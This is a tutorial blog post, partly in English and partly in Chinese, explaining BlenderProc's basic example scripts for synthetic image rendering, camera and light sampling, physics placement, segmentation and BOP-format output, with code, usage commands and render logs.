    # bproc.renderer.set_noise_threshold(0.01) # this is the default value

    # render the whole pipeline
    data = bproc.renderer.render()

First, we enable blenderproc to produce normals and distance for every color image. We also set the desired noise threshold: a lower threshold reduces the noise in the image but increases render time. The default of 0.01 is suitable for most applications.

=> This creates the files rgb_0000.png and rgb_0001.png in the temporary folder, along with the normal and depth images.

    • The normal and depth images are rendered in .exr format, which allows a linear color space and higher precision.
    • The depth image here is not antialiased, meaning that for each pixel the depth is not aggregated over its surface. Although distance and depth images sound similar, they are not the same: in a distance image, every pixel contains the actual distance from the camera position to the corresponding point in the scene, while in a depth image, every pixel contains the distance between the camera and the plane parallel to the camera that the corresponding point lies on.

=> This creates the files normal_0000.exr, normal_0001.exr, distance_0000.exr and distance_0001.exr.

In this example all of these files are temporary: they are read right after rendering and deleted from the temporary folder. They are then packed into a dictionary that is returned and stored in the data variable.

FAQ: Why store them on disk at all if we read them right back?

    • Blender has no other option: it must save them to disk first and then read them back.

First, calling bproc.renderer.enable_normals_output() and bproc.renderer.enable_depth_output(activate_antialiasing=False) enables normal and depth rendering. enable_normals_output() adds the normal pass to the render output, while enable_depth_output(activate_antialiasing=False) adds the depth pass with antialiasing turned off.

Then, bproc.renderer.render() runs the whole render pipeline and stores the result in the data variable. Rendering executes several processing steps in turn, including scene-graph traversal, lighting computation, material and texture mapping, before producing the final output. Afterwards, data contains the normal and depth information, which can be used for subsequent image processing, computer vision tasks and so on.

Save as .hdf5 files:

    bproc.writer.write_hdf5(args.output_dir, data)

    Camera sampling

    Usage

    blenderproc run examples/basics/camera_sampling/main.py examples/resources/scene.obj examples/basics/camera_sampling/output

    Visualization

    blenderproc vis hdf5 examples/basics/camera_sampling/output/0.hdf5
    Keys: 'colors': (512, 512, 3), 'depth': (512, 512), 'normals': (512, 512, 3)

    Code

# Find point of interest, all cam poses should look towards it
# bproc.object.compute_poi(objs) computes the geometric center poi of a set of objects,
# which serves as the focus point of the camera
poi = bproc.object.compute_poi(objs)
# Sample five camera poses, rendering five images
for i in range(5):
    # Sample random camera location above objects:
    # np.random.uniform([-10, -10, 8], [10, 10, 12]) draws a random camera location
    # with x, y in [-10, 10] and z in [8, 12]
    location = np.random.uniform([-10, -10, 8], [10, 10, 12])
    # Compute rotation based on vector going from location towards poi:
    # the vector from the camera location to poi is used as the forward vector, and inplane_rot
    # adds a little random in-plane rotation (in [-0.7854, 0.7854]) to the rotation matrix
    rotation_matrix = bproc.camera.rotation_from_forward_vec(poi - location, inplane_rot=np.random.uniform(-0.7854, 0.7854))
    # Combine location and rotation into a homogeneous camera-world transformation matrix
    cam2world_matrix = bproc.math.build_transformation_mat(location, rotation_matrix)
    # register it with BlenderProc for the later render; this renders the scene from different viewpoints
    bproc.camera.add_camera_pose(cam2world_matrix)

    Light sampling

    Usage

    blenderproc run examples/basics/light_sampling/main.py examples/resources/camera_positions examples/resources/scene.obj examples/basics/light_sampling/output

    Visualization

    blenderproc vis hdf5 examples/basics/light_sampling/output/0.hdf5

    png

    Code

# Define a light
light = bproc.types.Light()
light.set_type("POINT")
# Sample its location in a shell around the point [1, 2, 3]
light.set_location(bproc.sampler.shell(
    center=[1, 2, 3],
    radius_min=4,
    radius_max=7,
    elevation_min=15,
    elevation_max=70
))
light.set_energy(500)

This code means the following:

First, a BlenderProc Light variable named light is created.

Then, light.set_type("POINT") declares the light source a point light, i.e. a light radiating uniformly from a single point in 3D space.

Next, bproc.sampler.shell(center=[1, 2, 3], radius_min=4, radius_max=7, elevation_min=15, elevation_max=70) generates a random 3D location inside a shell around the point [1, 2, 3] and sets it as the light's location, randomizing the light position. The parameters are:

    • center=[1, 2, 3]: the center of the shell is [1, 2, 3].
    • radius_min=4: the minimum inner radius of the shell is 4.
    • radius_max=7: the maximum outer radius of the shell is 7.
    • elevation_min=15: the minimum elevation angle of the light position relative to the center is 15 degrees.
    • elevation_max=70: the maximum elevation angle of the light position relative to the center is 70 degrees.

Finally, light.set_energy(500) sets the light's energy to 500 watts, controlling the brightness.

# render the whole pipeline
data = bproc.renderer.render()

# Collect states of all objects
object_states = []
for obj in objs:
    object_states.append({
        "name": obj.get_name(),
        "local2world": obj.get_local2world_mat()
    })
# Add states (they are the same for all frames here)
data["object_states"] = [object_states] * bproc.utility.num_frames()

# Collect state of the one light
light_state = {
    "name": light.get_name(),
    "local2world": light.get_local2world_mat(),
    "energy": light.get_energy()
}
# Add states (it is the same for all frames here)
data["light_states"] = [light_state] * bproc.utility.num_frames()

# Collect state of the camera at all frames
cam_states = []
for frame in range(bproc.utility.num_frames()):
    cam_states.append({
        "cam2world": bproc.camera.get_camera_pose(frame),
        "cam_K": bproc.camera.get_intrinsics_as_K_matrix()
    })
# Add the states to the data dict
data["cam_states"] = cam_states

This code means the following:

First, bproc.renderer.render() renders the current scene and stores the result in data.

Then, iterating over every object obj in objs, the object's name and its local-to-world transformation matrix are appended to the object_states list.

The object_states list is replicated num_frames times and stored under the "object_states" key of the data dictionary, meaning the object states are the same for all frames.

Next, the light's name, local-to-world transformation matrix and energy are collected in the light_state dictionary, which is likewise replicated num_frames times and stored under the "light_states" key: the light state is the same for all frames.

Finally, looping over every frame index, the camera-to-world transformation matrix cam2world and the camera intrinsics matrix K of each frame are appended to the cam_states list, which is stored under the "cam_states" key, giving the camera state for every frame.

    Object selection and manipulation

    Usage

    blenderproc run examples/basics/entity_manipulation/main.py examples/resources/scene.obj examples/basics/entity_manipulation/output

    Visualization

    blenderproc vis hdf5 examples/basics/entity_manipulation/output/0.hdf5


    Code

    # load the objects into the scene
    objs = bproc.loader.load_obj(args.scene)

    # Find object with name Suzanne
    suzanne = bproc.filter.one_by_attr(objs, "name", "Suzanne")
    # Set its location and rotation
    suzanne.set_location(np.random.uniform([0, 1, 2], [1, 2, 3]))
    suzanne.set_rotation_euler([1, 1, 0])

The focus of this example is using BlenderProc for filtering, and for setting the rotation and location of objects.

In this filter operation the condition is "name": 'Suzanne', meaning we want to select every object that satisfies obj.name == 'Suzanne'. In this case only one object matches. To select multiple elements, we can use the bproc.filter.by_attr() function instead.

Note: any given string attribute value can be treated as a regular expression by setting regex=True in the one_by_attr call. A condition of "name": 'Cylinder.*' would therefore select all three cylinders in the scene.

For all possible attribute names, consult the official Blender documentation: https://docs.blender.org/api/current/bpy.types.Object.html.
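Following the note above, selecting and moving all cylinders could look like this (a sketch; it assumes by_attr also accepts regex=True, and reuses objs and np from the example):

# Select all three cylinders via a regex on the name attribute
cylinders = bproc.filter.by_attr(objs, "name", "Cylinder.*", regex=True)
for cyl in cylinders:
    cyl.set_location(np.random.uniform([0, 1, 2], [1, 2, 3]))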

    Material selection and manipulation

    Usage

    blenderproc run examples/basics/material_manipulation/main.py examples/basics/material_manipulation/scene.obj images examples/basics/material_manipulation/output
    • examples/basics/material_manipulation/main.py: path to the python file.
    • examples/basics/material_manipulation/scene.obj: path to the object file with the basic scene.
    • images: path to a folder with .jpg textures to be used in the sampling process.
    • examples/basics/material_manipulation/output: path to the output directory.

    Visualization

    blenderproc vis hdf5 examples/basics/material_manipulation/output/0.hdf5


    # Find all materials
    materials = bproc.material.collect_all()

    # Find the material of the ground object
    ground_material = bproc.filter.one_by_attr(materials, "name", "Material.001")
    # Set its displacement based on its base color texture
    ground_material.set_displacement_from_principled_shader_value("Base Color", multiply_factor=1.5)

This code does the following:

1. bproc.material.collect_all() finds all materials.
2. bproc.filter.one_by_attr() finds a specific material by attribute; here "name": "Material.001" locates the material of the ground object.
3. ground_material.set_displacement_from_principled_shader_value() sets a displacement based on the material's base color texture. Here multiply_factor is set to 1.5 to increase the displacement strength.

The point of this code is to modify the attributes of a specific material for more creative render results.

# Collect all jpg images in the specified directory
images = list(Path(args.image_dir).absolute().rglob("material_manipulation_sample_texture*.jpg"))
for mat in materials:
    # Load one random image
    image = bpy.data.images.load(filepath=str(random.choice(images)))
    # Set it as base color of the current material
    mat.set_principled_shader_value("Base Color", image)

This code does the following:

1. Path() from the pathlib library resolves the absolute path of the given directory (args.image_dir), and rglob() finds all files in it matching "material_manipulation_sample_texture*.jpg".

2. It then iterates over all materials and assigns each a randomly chosen texture: random.choice() picks one of the collected images, and mat.set_principled_shader_value() sets it as the base color of the current material.

The point of this code is to give all materials in the given Blender scene varied texture assets, improving the realism of the renders.

    Physics positioning

    Usage

    blenderproc run examples/basics/physics_positioning/main.py examples/basics/physics_positioning/active.obj examples/basics/physics_positioning/passive.obj examples/basics/physics_positioning/output
    • examples/basics/physics_positioning/main.py: path to the python file.
    • examples/basics/physics_positioning/active.obj: path to the object file with active objects, i. e. objects which we want to participate in physics simulation.
    • examples/basics/physics_positioning/passive.obj: path to the object file with passive objects, i. e. objects which we do not want to participate in physics simulation, e.g. plane.
    • examples/basics/physics_positioning/output: path to the output directory.

    Visualization

    blenderproc vis hdf5 examples/basics/physics_positioning/output/0.hdf5


    Code

# Define a function that samples the pose of a given sphere
def sample_pose(obj: bproc.types.MeshObject):
    obj.set_location(np.random.uniform([-5, -5, 8], [5, 5, 12]))
    obj.set_rotation_euler(bproc.sampler.uniformSO3())

# Sample the poses of all spheres above the ground without any collisions in-between
bproc.object.sample_poses(
    spheres,
    sample_pose_func=sample_pose
)

First, we define a function that assigns a new pose to a given object. bproc.object.sample_poses then calls this function on every object and checks for collisions with the other objects; this repeats until all objects are placed without collisions.

This code does the following:

1. It defines sample_pose(), which takes a bproc.types.MeshObject and randomizes its location and rotation to simulate object poses in 3D space. Concretely, obj.set_location() places the object at a random location between [-5, -5, 8] and [5, 5, 12], and obj.set_rotation_euler() assigns a random rotation (sampled uniformly over SO(3)).
2. bproc.object.sample_poses() samples poses for all spheres above the ground while ensuring no collisions between them, by passing the spheres and sample_pose_func parameters, where sample_pose_func is the sample_pose() function defined above.

The point of this code is to simulate the placement of objects, adding realism to the renders.

# Make all spheres actively participate in the simulation:
# obj.enable_rigidbody(active=True) lets each sphere take part in the physics simulation
# as an active body that receives forces and collisions
for obj in spheres:
    obj.enable_rigidbody(active=True)
# The ground should only act as an obstacle and is therefore marked passive.
# To let the spheres fall into the valleys of the ground, make the collision shape MESH instead of CONVEX_HULL.
ground.enable_rigidbody(active=False, collision_shape="MESH")

# Run the simulation and fix the poses of the spheres at the end:
# min_simulation_time and max_simulation_time give the minimum and maximum simulation time in seconds,
# and check_object_interval the interval (in seconds) at which object motion is checked before fixing
# the poses. Here the simulation runs between 4s and 20s, checking the object positions once per second.
# (Note: the function has no effect if physics was not enabled.)
bproc.object.simulate_physics_and_fix_final_poses(min_simulation_time=4, max_simulation_time=20, check_object_interval=1)

This code does the following:

1. All sphere objects are made active by enabling their rigidbody property. The ground gets active=False, meaning it is passive in the scene but can still interact with active objects. We also give the ground a MESH collision shape instead of the default CONVEX_HULL. Note that in more complex use cases the mesh collision shape can cause performance problems and errors; if that happens, it is better to try physics_convex_decomposition.
2. While the simulation runs, the function checks once per second whether any objects are still moving; if not, the simulation stops. The simulation nevertheless runs for at least 4 and at most 20 seconds.
3. At the end of the simulation, the poses of all spheres are fixed. This makes it easy to sample random sphere positions above an uneven plane.

The point of this code is to simulate the physical interaction and motion of objects, adding realism to the renders.

    Semantic Segmentation

    Usage

    blenderproc run examples/basics/semantic_segmentation/main.py examples/resources/camera_positions examples/basics/semantic_segmentation/scene.blend examples/basics/semantic_segmentation/output
    • examples/basics/semantic_segmentation/main.py: path to the python file.
    • examples/resources/camera_positions: text file with parameters of camera positions.
    • examples/basics/semantic_segmentation/scene.blend: path to the blend file with the basic scene.
    • examples/basics/semantic_segmentation/output: path to the output directory.

    Visualization

    blenderproc vis hdf5 examples/basics/semantic_segmentation/output\1.hdf5


    Code

    # load the objects into the scene
    objs = bproc.loader.load_blend(args.scene)

This code loads the .blend file, extracting only the mesh objects rather than all the information stored in that .blend file.

Note that in the loaded .blend file all objects already carry a custom property named "category_id". This can also be set manually via the following step:

    obj.set_cp("category_id", 0)
    # enable segmentation masks (per class and per instance)
    bproc.renderer.enable_segmentation_output(map_by=["category_id", "instance", "name"])

This module can map any kind of object-related information to an image, or to a list of indices of the objects in the scene. For example, to map the custom property category_id onto an image, set map_by=["category_id"]; every pixel is then assigned the category_id of the object visible in that pixel. If it is set to instance, every pixel receives the id of an object in the scene; these ids are consistent across frames, which also means that not every id has to appear in every image.

It can also be set to other custom properties or attributes of the object class, such as "name", which returns the name of each object. Names cannot be stored in an image, so an additional dictionary is generated and attached to the final .hdf5 container, mapping each instance number to a name. If any key cannot be stored in an image, an instance image must be generated, otherwise an error is raised.

An attribute such as "location" can also be used; it accesses each object's location and adds it to the dictionary. Note that this raises an error if the background is visible, since the background has no location attribute. This can be avoided by providing a default value, e.g. default_values={"location": [0, 0, 0]}.
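Combining these options, a call with default values for the background might look as follows (a sketch based on the description above; the chosen defaults are illustrative):

bproc.renderer.enable_segmentation_output(
    map_by=["category_id", "instance", "name", "location"],
    default_values={"category_id": 0, "location": [0, 0, 0]}
)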

    Camera Object Pose Setting

    Usage

    blenderproc run examples/basics/camera_object_pose/main.py examples/basics/camera_object_pose/obj_000004.ply examples/basics/camera_object_pose/output
    • examples/basics/camera_object_pose/main.py: path to the Python file.

The subsequent arguments fill the placeholders in the configuration file, e.g. <args:0>.

    • examples/basics/camera_object_pose/obj_000004.ply: path to the model file, here a basic object from the hb dataset.
    ply
    format ascii 1.0
    element vertex 59070
    property float x
    property float y
    property float z
    property float nx
    property float ny
    property float nz
    property uchar red
    property uchar green
    property uchar blue
    property uchar alpha
    element face 118136
    property list uchar int vertex_indices
    end_header
    -74.8915252685546875 -19.9308242797851562 -39.8891220092773438 -0.881483376026153564 0.153793498873710632 -0.446469098329544067 201 194 89 255
    -74.283599853515625 -19.7608661651611328 -40.8353233337402344 -0.821542501449584961 0.139040097594261169 -0.552933812141418457 203 203 102 255
    -74.7142333984375 -19.3212966918945312 -39.9898719787597656 -0.876855313777923584 0.193883597850799561 -0.43992498517036438 201 196 92 255

    ...

    3 276 277 275
    3 279 278 249
    3 279 249 252

    ...

This ply file contains the data of a triangle mesh; each line describes either a vertex or a triangular face. The parts of the file are:

The first line identifies the PLY file format used by the file.

The second line states that the data is in ASCII format, version 1.0.

The third line declares that the model contains 59070 vertices.

Lines four to ten declare the per-vertex properties: the x, y, z coordinates, the normal nx, ny, nz, and the color properties red, green, blue, alpha.

The eleventh line declares that the model contains 118136 triangles (faces).

The twelfth line defines the property list of the face data: how many vertices make up each face, followed by the corresponding vertex indices.

The thirteenth line is the separator between the header and the data.

From the fourteenth line on, each line describes one vertex: the x, y, z coordinates, the normal nx, ny, nz and the color red, green, blue, alpha, in that order.

After the last vertex, each following line describes one triangular face in the form "3 a b c": the face consists of the three vertices a, b, c, given as indices into the vertex list.

Overall, this PLY file describes a triangle mesh with the required vertex and face data, readable and displayable by 3D modeling software and game engines.

    • examples/basics/camera_object_pose/output: path to the output directory.


Output in the BOP dataset format.

    Code

# Use vertex color for texturing
for mat in obj.get_materials():
    mat.map_vertex_color()
# Set pose of object via local-to-world transformation matrix
obj.set_local2world_mat(
    [[0.331458, -0.9415833, 0.05963787, -0.04474526765165741],
     [-0.6064861, -0.2610635, -0.7510136, 0.08970402424862098],
     [0.7227108, 0.2127592, -0.6575879, 0.6823395750305427],
     [0, 0, 0, 1.0]]
)
# Scale 3D model from mm to m
obj.set_scale([0.001, 0.001, 0.001])
# Set category id which will be used in the BopWriter
obj.set_cp("category_id", 1)
    • Convert all materials to vertex-color materials and use the vertex colors of each loaded .ply object directly. This means we no longer use the original material files; the scene is rendered from vertex colors instead.
    • Set the object pose via its matrix_world property, in meters.
    • Scale the model from millimeters (mm) to meters (m) along each dimension. Note that this step is unnecessary if the model is already in meters.
    • Set a new custom property "category_id" to 1; the segmentation renderer later uses this property.

The purpose of this code is to preprocess and prepare the loaded model for the rest of the render pipeline: converting materials to vertex colors reduces the texture lookups and simplifies rendering; scaling to the standard meter unit makes it easy to control the scene scale and the distances between objects; and the custom property adds class information so the later segmentation renderer can distinguish the objects.

# Set intrinsics via K matrix.
# The K matrix contains the focal lengths, the principal point, distortion parameters etc.,
# describing the internal optics of the camera. The function takes the K matrix plus the
# final image width and height.
bproc.camera.set_intrinsics_from_K_matrix(
    [[537.4799, 0.0, 318.8965],
     [0.0, 536.1447, 238.3781],
     [0.0, 0.0, 1.0]], 640, 480
)
# Set camera pose via cam-to-world transformation matrix.
# cam2world describes the transformation of the camera frame relative to the world frame;
# such a matrix usually comes from external sensors, e.g. an IMU or GPS.
cam2world = np.array([
    [1, 0, 0, 0],
    [0, 1, 0, 0],
    [0, 0, 1, 0],
    [0, 0, 0, 1]
])
# Change coordinate frame of transformation matrix from OpenCV to Blender coordinates,
# since the matrix above uses the OpenCV convention
cam2world = bproc.math.change_source_coordinate_frame_of_transformation_matrix(cam2world, ["X", "-Y", "-Z"])
bproc.camera.add_camera_pose(cam2world)

The purpose of this code is to configure the camera's internal optics and its pose. With the intrinsics and pose set, the camera's position and orientation in the scene, as well as the distortion effects during capture, can be simulated precisely, which helps produce more realistic renders and improves the accuracy of vision algorithms.

    • Set the camera's K matrix by calling set_intrinsics_from_K_matrix.
    • The camera pose is defined by its world matrix, which in this case is simply the identity.
    • Change the camera source frame to match the Blender frame (this converts from the OpenCV coordinate system to Blender's).
    • Finally, add this new camera matrix to the poses, and rendering can begin.
    # render the whole pipeline
    data = bproc.renderer.render()

    # Write object poses, color and depth in bop format
    bproc.writer.write_bop(args.output_dir, [obj], data["depth"], data["colors"], m2mm=True, append_to_existing_output=True)

The BOP dataset is a public benchmark for object pose estimation in industrial scenes. It contains 80 challenging industrial parts, each with different materials, deformations, surface textures and reflectance properties. For every part, hundreds of grayscale images with realistic depth noise and RGB images were captured. BOP also provides a formal model of every part, i.e. a CAD file, so your method can be compared against the CAD models. The main purpose of BOP is to provide a standardized benchmark for evaluating pose estimation algorithms in industrial scenes.

    • Saves all pose and camera information as provided in BOP datasets.
    • "m2mm" converts the poses to millimeters, consistent with the original BOP annotations. Set it to False to keep meters as the unit.
    • "append_to_existing_output" means that data is appended rather than overwritten if the same output folder is chosen.
    ]]>
    + 资源

    仓库地址:DLR-RM/BlenderProc: A procedural Blender pipeline for photorealistic training image generation (github.com),下载到本地,用 python 打开,解释器使用之前创建的 blender 环境。

    正文

    Basic example

    Usage

    示例代码在 examples/basics/basic/main.py 中。shell 中输入:

    1
    blenderproc run examples/basics/basic/main.py examples/resources/camera_positions examples/resources/scene.obj examples/basics/basic/output

    即可开跑!我说婷婷,会报错:

    1
    2
    3
    4
    5
    6
    7
    It seems the freeimage library which is necessary to read .exr files cannot be found on your computer.
    Gonna try to download it automatically.
    Imageio: 'freeimage-3.15.1-win64.dll' was not found on your computer; downloading it now.
    Error while fetching file: <urlopen error timed out>.
    Error while fetching file: The read operation timed out.
    Error while fetching file: <urlopen error timed out>.
    Error while fetching file: <urlopen error timed out>.

    我设了个全局代理和 TUN 模式再多跑几次就可以了 orz

    png

    这么看从网上下载 freeimage-3.15.1-win64.dll,然后放到 C:\Users\XXXX\AppData\Local\imageio\freeimage\ 下也是可以的!

    1
    File saved as C:\Users\XXXX\AppData\Local\imageio\freeimage\freeimage-3.15.1-win64.dll.
    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    19
    20
    21
    22
    23
    24
    25
    26
    27
    28
    29
    30
    31
    32
    33
    34
    35
    36
    37
    Warning: Changed install path from /home_local\XXX... to C:\Users\XXX..., there is no /home_local/ on this machine.
    Using blender in C:\Users\XXX\blender\blender-3.3.0-windows-x64
    Using temporary directory: C:\Users\XXX\AppData\Local\Temp\blender_proc_b830ed3583e7442cbe7cde6a0b37bd2b
    Blender 3.3.0 (hash 0759f671ce1f built 2022-09-07 00:44:18)
    Selecting render devices...
    Device NVIDIA GeForce RTX 4060Laptop GPU of type OPTIX found and used.
    Device 13th Gen Intel Core i9-13900HX of type CPU found and used.
    Timer 'OBJ_import' took 1.5ms
    Fra:0 Mem:10.46M (Peak 10.69M) | Time:00:00.16 | Mem:0.00M, Peak:0.00M | Scene, ViewLayer | Synchronizing object | Cube
    Fra:0 Mem:10.47M (Peak 10.69M) | Time:00:00.17 | Mem:0.00M, Peak:0.00M | Scene, ViewLayer | Synchronizing object | Suzanne

    ...

    Fra:0 Mem:85.58M (Peak 85.58M) | Time:00:01.04 | Compositing | Tile 4-4
    Fra:0 Mem:85.52M (Peak 85.58M) | Time:00:01.04 | Compositing | De-initializing execution
    Saved: C:\Users\XXX\AppData\Local\Temp\blender_proc_b830ed3583e7442cbe7cde6a0b37bd2b\normals_0000.exr
    Saved: C:\Users\XXX\AppData\Local\Temp\blender_proc_b830ed3583e7442cbe7cde6a0b37bd2b\depth_0000.exr
    Saved: 'C:\Users\XXX\AppData\Local\Temp\blender_proc_b830ed3583e7442cbe7cde6a0b37bd2b\rgb_0000.png'
    Time: 00:01.36 (Saving: 00:00.30)

    Fra:1 Mem:31.51M (Peak 85.58M) | Time:00:00.00 | Mem:0.46M, Peak:0.46M | Scene, ViewLayer | Initializing
    Fra:1 Mem:31.51M (Peak 85.58M) | Time:00:00.00 | Mem:0.46M, Peak:0.46M | Scene, ViewLayer | Waiting for render to start

    ...

    Fra:1 Mem:85.58M (Peak 85.58M) | Time:00:00.83 | Compositing | Tile 4-4
    Fra:1 Mem:85.52M (Peak 85.58M) | Time:00:00.83 | Compositing | De-initializing execution
    Saved: C:\Users\XXX\AppData\Local\Temp\blender_proc_b830ed3583e7442cbe7cde6a0b37bd2b\normals_0001.exr
    Saved: C:\Users\XXX\AppData\Local\Temp\blender_proc_b830ed3583e7442cbe7cde6a0b37bd2b\depth_0001.exr
    Saved: 'C:\Users\XXX\AppData\Local\Temp\blender_proc_b830ed3583e7442cbe7cde6a0b37bd2b\rgb_0001.png'
    Time: 00:00.86 (Saving: 00:00.01)

    Merging data for frame 0 into examples/basics/basic/output\0.hdf5
    Merging data for frame 1 into examples/basics/basic/output\1.hdf5

    Blender quit
    Cleaning temporary directory

    Visualization

    1
    blenderproc vis hdf5 examples/basics/basic/output/0.hdf5

    渲染了 colors、depth、normals 三张图片:

    png

    Code

    接受三个 parser 参数:

    • examples/resources/camera_positions:相机参数文本文件。

    png

    第一行数据表示相机位于 (0, -13.741, 4.1242) 的位置,其绕 x 轴旋转角度为 1.3,绕 y 轴旋转角度为 0,绕 z 轴旋转角度为 0。

    第二行数据表示相机位于 (1.9488, -6.5202, 0.23291) 的位置,其绕 x 轴旋转角度为 1.84,绕 y 轴旋转角度为 0,绕 z 轴旋转角度为 0.5。

    • examples/resources/scene.obj:obj 文件,basic scene 的信息。

    png

    这是一个 Wavefront OBJ 文件,它是一种 3D 对象文件格式。该文件包含了多个物体:“Cube” 和 “Cube.001” 等。

    在文件的开头,有一行 “mtllib scene.mtl”,表示该文件引用了一个名为 “scene.mtl” 的材质库文件,其中定义了这些物体所使用的材质/纹理信息。

    接下来,通过使用 “v”,“vt”,和 “vn” 关键字定义了每一个物体的顶点位置、纹理坐标和法向量。

    具体来说,每一个 “v” 后面的三个数值表示一个顶点的 x,y 和 z 坐标;

    每一个 “vt” 后面的两个数值表示一个纹理坐标值,在这个文件中,它们是相对于材质图像的位置;

    每一个 “vn” 后面的三个数值表示一个法向量的 x,y 和 z 分量。

    下面排列的 “f” 行表示了多边形,每一个 “f” 后面跟随着一些数字,这些数字表示该多边形的组成部分。

    在这个文件中,不同的数字之间使用斜线 “/” 分隔。

    具体来说,每一个数字表示该物体的一个顶点,该顶点由前面的 “v” 行中相应编号的顶点位置信息定义,而后面的数字则来自前面的 “vt” 和 “vn” 行。

    每一行的最后一个数字是该多边形的法向量,这个法向量来自 “vn” 行,指定了多边形所在平面的朝向。

    “s off” 表示关闭了 smooth shading,即不使用平滑着色技术。

    • examples/basics/basic/output:输出文件路径
    1
    2
    3
    4
    5
    6
    7
    8
    import blenderproc as bproc
    import argparse

    parser = argparse.ArgumentParser()
    parser.add_argument('camera', help="Path to the camera file, should be examples/resources/camera_positions")
    parser.add_argument('scene', help="Path to the scene.obj file, should be examples/resources/scene.obj")
    parser.add_argument('output_dir', help="Path to where the final files, will be saved, could be examples/basics/basic/output")
    args = parser.parse_args()

    初始化 blenderproc:

    1
    bproc.init()

    args.scene 中载入模型场景:

    1
    objs = bproc.loader.load_obj(args.scene)

    载入灯光:

    1
    2
    3
    4
    5
    # define a light and set its location and energy level
    light = bproc.types.Light()
    light.set_type("POINT")
    light.set_location([5, -5, 5])
    light.set_energy(1000)

    载入相机:这段代码的作用是设置相机分辨率,并读取相机位置信息并转换为齐次相机-世界变换矩阵。

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    # define the camera resolution
    # 首先,调用 bproc.camera.set_resolution() 函数来定义相机的分辨率,该函数接受两个参数,即相机图像的宽度和高度。在这个示例中,我们将相机分辨率设置为 512x512。
    bproc.camera.set_resolution(512, 512)

    # read the camera positions file and convert into homogeneous camera-world transformation
    with open(args.camera, "r") as f:
    for line in f.readlines():
    # 使用一个 for 循环来逐行读取相机位置文件中的信息,并将每个位置信息转换为齐次变换矩阵,并通过调用 bproc.camera.add_camera_pose() 函数将其添加到 BlenderProc 中。
    line = [float(x) for x in line.split()]
    position, euler_rotation = line[:3], line[3:6]
    matrix_world = bproc.math.build_transformation_mat(position, euler_rotation)
    bproc.camera.add_camera_pose(matrix_world)

    渲染图像:

    1
    2
    3
    4
    5
    6
    7
    # activate normal and depth rendering
    bproc.renderer.enable_normals_output()
    bproc.renderer.enable_depth_output(activate_antialiasing=False)
    # bproc.renderer.set_noise_threshold(0.01) # this is the default value

    # render the whole pipeline
    data = bproc.renderer.render()

    首先,我们需要启用 blenderproc 生成每张彩色图像的法线和距离。此外,我们设置所需的图像噪声阈值。较低的噪声阈值将减少图像中的噪声,但会增加渲染时间。默认值为 0.01,适用于大多数应用程序。

    =>在临时文件夹中创建文件 rgb_0000.pngrgb_0001.png。同时还创建法线和深度图像。

    • 法线和深度图像是使用 .exr 格式渲染的,可以线性色彩空间和更高的精度。
    • 在这里,深度图像没有反锯齿处理,意味着对于每个像素,该像素中的深度不会聚合在其表面上。虽然距离和深度图像听起来很相似,但它们并不相同:在距离图像中,每个像素都包含从摄像机位置到场景中对应点的实际距离。而在深度图像中,每个像素都包含相应点所处的与摄像机平行的平面与摄像机之间的距离。

    =>创建文件 normal_0000.exrnormal_0001.exrdistance_0000.exrdistance_0001.exr

    在本例中,所有这些文件都是临时文件,直接在渲染后读取并在临时文件夹中删除。然后将它们打包成字典并返回,保存在 data 变量中。

    FAQ:如果我们直接读取它们,为什么还要将它们存储在磁盘上?

    • Blender 没有其他选项,只能先将它们保存到磁盘,然后再读取它们。

    首先,通过调用 bproc.renderer.enable_normals_output() 和 bproc.renderer.enable_depth_output(activate_antialiasing=False) 函数,启用了法线和深度渲染。其中,enable_normals_output() 函数允许将法线渲染输出到渲染结果中,而 enable_depth_output(activate_antialiasing=False) 函数则允许将深度渲染输出到渲染结果中,并且关闭了抗锯齿选项。

    接着,调用 bproc.renderer.render() 函数,开始渲染整个渲染管线,并将渲染结果存储在 data 变量中。在渲染过程中,会依次执行多个处理步骤,包括场景图遍历、光照计算、材质映射、纹理映射等,并最终生成最终的渲染结果。渲染结束后,data 变量中将包含法线和深度信息,它们可以用来进行后续的图像处理、计算机视觉等任务。

    保存成 .hdf5 文件:

    1
    bproc.writer.write_hdf5(args.output_dir, data)

    Camera sampling

    Usage

    1
    blenderproc run examples/basics/camera_sampling/main.py examples/resources/scene.obj examples/basics/camera_sampling/output

    Visualization

    1
    blenderproc vis hdf5 examples/basics/camera_sampling/output/0.hdf5
    1
    Keys: 'colors': (512, 512, 3), 'depth': (512, 512), 'normals': (512, 512, 3)

    Code

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    13
    14
    15
    16
    17
    18
    # Find point of interest, all cam poses should look towards it
    # 通过调用 bproc.object.compute_poi(objs) 函数,计算出一组物体的几何中心点 poi,作为相机观察的焦点。
    poi = bproc.object.compute_poi(objs)
    # Sample five camera poses
    # 采样了五个随机的相机位置,渲染出 5 张图
    for i in range(5):
    # Sample random camera location above objects
    # 通过调用 np.random.uniform([-10, -10, 8], [10, 10, 12]) 函数,从一个三维坐标区间中随机取得一个相机位置,其中相机位置的 x、y 坐标范围为 [-10, 10],z 坐标范围为 [8, 12]。
    location = np.random.uniform([-10, -10, 8], [10, 10, 12])
    # Compute rotation based on vector going from location towards poi
    # 对于每一个相机位置,进一步计算其旋转矩阵 rotation_matrix,以便将相机的视线朝向 poi 的方向。
    # 具体而言,调用 bproc.camera.rotation_from_forward_vec(poi - location, inplane_rot=np.random.uniform(-0.7854, 0.7854)) 函数,以相机位置和 poi 之间的向量作为前向向量,并通过 inplane_rot 参数加入少量的水平旋转随机性(其值在 [-0.7854, 0.7854] 范围内)来计算出旋转矩阵 rotation_matrix。
    rotation_matrix = bproc.camera.rotation_from_forward_vec(poi - location, inplane_rot=np.random.uniform(-0.7854, 0.7854))
    # Add homog cam pose based on location an rotation
    # 将相机位置和旋转信息组合为齐次相机-世界变换矩阵
    cam2world_matrix = bproc.math.build_transformation_mat(location, rotation_matrix)
    # 将其添加到 BlenderProc 中,以便后续渲染时使用。这样,就实现了对场景从不同视角的渲染。
    bproc.camera.add_camera_pose(cam2world_matrix)

    Light sampling

    Usage

    1
    blenderproc run examples/basics/light_sampling/main.py examples/resources/camera_positions examples/resources/scene.obj examples/basics/light_sampling/output

    Visualization

    1
    blenderproc vis hdf5 examples/basics/light_sampling/output/0.hdf5

    png

    Code

    1
    2
    3
    4
    5
    6
    7
    8
    9
    10
    11
    12
    # Define a light
    light = bproc.types.Light()
    light.set_type("POINT")
    # Sample its location in a shell around the point [1, 2, 3]
    light.set_location(bproc.sampler.shell(
